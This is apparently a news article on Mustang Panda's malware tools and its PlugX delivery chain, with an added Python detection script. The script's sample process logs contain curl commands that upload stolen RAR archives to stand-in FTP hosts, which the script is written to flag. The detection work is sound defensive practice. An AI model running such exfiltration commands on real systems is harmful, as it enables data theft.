Mustang Panda Upgrades Malware Tools for Advanced Data Exfiltration Campaign

The threat actor known as Mustang Panda has refined its malware arsenal with new tools to enhance data exfiltration and deploy next-stage payloads, as reported by Trend Micro.

The cybersecurity firm, tracking this activity under the name Earth Preta, noted that the group has been "propagating PUBLOAD via a variant of the worm HIUPAN."

PUBLOAD is a well-known downloader malware that has been associated with Mustang Panda since early 2022. It has primarily been used in cyberattacks targeting government entities in the Asia-Pacific (APAC) region, often delivering the notorious PlugX malware.

"PUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP, a secondary control tool, which performs similar tasks to PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option," said security researchers Lenart Bermejo, Sunny Lu, and Ted Lee.

Trend Micro had previously documented Mustang Panda's use of removable drives for spreading HIUPAN, which Google-owned Mandiant tracks as MISTCLOAK. This activity has been observed since September 2021, linked to cyber espionage campaigns targeting nations like the Philippines.

PUBLOAD comes equipped with features that conduct reconnaissance on infected networks and harvest files, including documents like .doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx. It also acts as a gateway for introducing new hacking tools such as FDMTP, a simple malware downloader based on TouchSocket over Duplex Message Transport Protocol (DMTP).

Captured information is compressed into a RAR archive and exfiltrated via FTP using cURL. Additionally, Mustang Panda deploys a custom program named PTSOCKET, which transfers files in multi-thread mode.
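The cURL-over-FTP exfiltration step described above is one that process-creation telemetry can expose. The following is an added detection example, not code from the article or from Trend Micro: it runs over constructed log lines in an assumed "timestamp host user cmd=..." format and flags curl command lines that upload a .rar archive to an ftp:// destination, while leaving SFTP transfers alone.

```python
import re
import shlex

# Constructed process-creation log lines for this example (not from the article);
# assumed format: "<timestamp> <host> <user> cmd=<full command line>"
SAMPLE_LOGS = [
    '2024-06-12T09:14:02Z ws-07 jdoe cmd=curl.exe -T C:\\Users\\Public\\collect.rar ftp://198.51.100.23/up/ -u anon:anon',
    '2024-06-12T09:15:10Z ws-07 jdoe cmd=curl.exe -s https://update.example.com/version.json',
    '2024-06-12T09:16:44Z srv-01 svc_backup cmd=curl --upload-file nightly.tar.gz sftp://backup.internal/vault/',
    '2024-06-12T09:17:31Z ws-11 asmith cmd=curl.exe --upload-file "C:\\Temp\\docs.rar" ftp://203.0.113.8/',
]
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<host>\S+) (?P<user>\S+) cmd=(?P<cmd>.*)$')
UPLOAD_FLAGS = {'-T', '--upload-file'}   # curl upload switches
ARCHIVE_EXTS = ('.rar',)                 # extend to .zip/.7z if your environment warrants it

def parse_log(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_ftp_archive_upload(cmd):
    """True when a curl command line uploads a .rar archive to an ftp:// destination;
    sftp:// (SSH) is deliberately not matched, so SFTP backup jobs stay out of the results."""
    try:
        argv = shlex.split(cmd, posix=False)   # non-posix mode keeps Windows backslashes intact
    except ValueError:
        return False                           # unbalanced quotes: not parseable
    if not argv or re.split(r'[\\/]', argv[0])[-1].lower() not in ('curl', 'curl.exe'):
        return False
    upload, ftp_dest = None, False
    for i, tok in enumerate(argv[1:], start=1):
        t = tok.strip('"\'')
        if t in UPLOAD_FLAGS and i + 1 < len(argv):
            upload = argv[i + 1].strip('"\'')
        elif t.startswith('--upload-file='):
            upload = t.split('=', 1)[1].strip('"\'')
        elif t.lower().startswith('ftp://'):
            ftp_dest = True
    return ftp_dest and upload is not None and upload.lower().endswith(ARCHIVE_EXTS)

def find_exfil_candidates(lines):
    """Return (host, user, cmd) for each log line matching the curl/FTP/RAR pattern."""
    hits = []
    for line in lines:
        rec = parse_log(line)
        if rec and is_ftp_archive_upload(rec['cmd']):
            hits.append((rec['host'], rec['user'], rec['cmd']))
    return hits

print(find_exfil_candidates(SAMPLE_LOGS))
```

Tune the archive extensions and the upload-flag set to your own environment; curl used for FTP uploads by administrators is a legitimate source of matches and should be baselined before alerting.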

Advanced Malware Tactics

Trend Micro also highlighted a "fast-paced spear-phishing campaign" detected in June 2024, which distributed email messages containing a .url attachment. When launched, this attachment delivered a signed downloader known as DOWNBAIT.

The campaign targeted countries including Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan, as is evident from the filenames and decoy documents used.

DOWNBAIT serves as a first-stage loader that retrieves and executes the PULLBAIT shellcode, which then downloads and runs the CBROVER backdoor. This implant supports file download, remote shell execution, and acts as a delivery vehicle for the PlugX remote access trojan (RAT). PlugX then deploys another custom file collector, FILESAC, to steal the victim’s data.

A separate report by Palo Alto Networks Unit 42 also revealed Mustang Panda’s use of Visual Studio Code's embedded reverse shell to gain initial access to target networks. This shows that the group continues to adjust its tactics, adopting new methods for cyber espionage.

"Earth Preta has shown significant advancements in their malware deployment and strategies, particularly in their campaigns targeting government entities," the researchers said. "The group has evolved their tactics, [...] leveraging multi-stage downloaders (from DOWNBAIT to PlugX) and possibly exploiting Microsoft's cloud services for data exfiltration."

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067